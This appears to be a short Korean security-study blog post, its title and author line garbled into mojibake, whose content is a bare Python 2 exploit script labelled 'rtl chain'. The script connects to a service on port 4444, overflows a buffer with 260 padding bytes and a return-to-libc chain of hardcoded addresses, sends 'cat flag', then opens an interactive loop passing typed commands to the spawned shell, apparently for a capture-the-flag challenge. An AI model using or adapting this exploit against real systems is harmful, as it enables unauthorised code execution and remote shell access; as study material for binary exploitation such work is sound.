Security Study/Source
rtl chain
๐๐พ๐ฌ๐ฎ๐ฝ๐ฎ_๐ข๐ฝ๐ฎ๐ต๐ต๐ช
2015. 11. 21. 13:40
728x90
๋ฐ์ํ
- from socket import *
- HOST = ""
- PORT = 4444
- s = socket(AF_INET,SOCK_STREAM)
- s.connect((HOST,PORT)) #connect
- payload = "\x90"*260
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x43\xa0\x04\x08"+"\xc2\x82\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x44\xa0\x04\x08"+"\x54\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x45\xa0\x04\x08"+"\x99\x86\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x46\xa0\x04\x08"+"\x88\x86\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x47\xa0\x04\x08"+"\xd4\x9f\x04\x08"
- payload += "\xc0\x83\x04\x08"+"AAAA"+"\x40\xa0\x04\x08"
- print s.recv(1024) #1024 byte read
- s.send(payload + "\n")
- print s.recv(1024)
- s.send("cat flag" + "\n")
- print s.recv(1024)
- while True:
- cmd = raw_input("$")
- s.send(cmd + "\n")
- print s.recv(1024)
- print s.recv(1024)
- s.close()
728x90
๋ฐ์ํ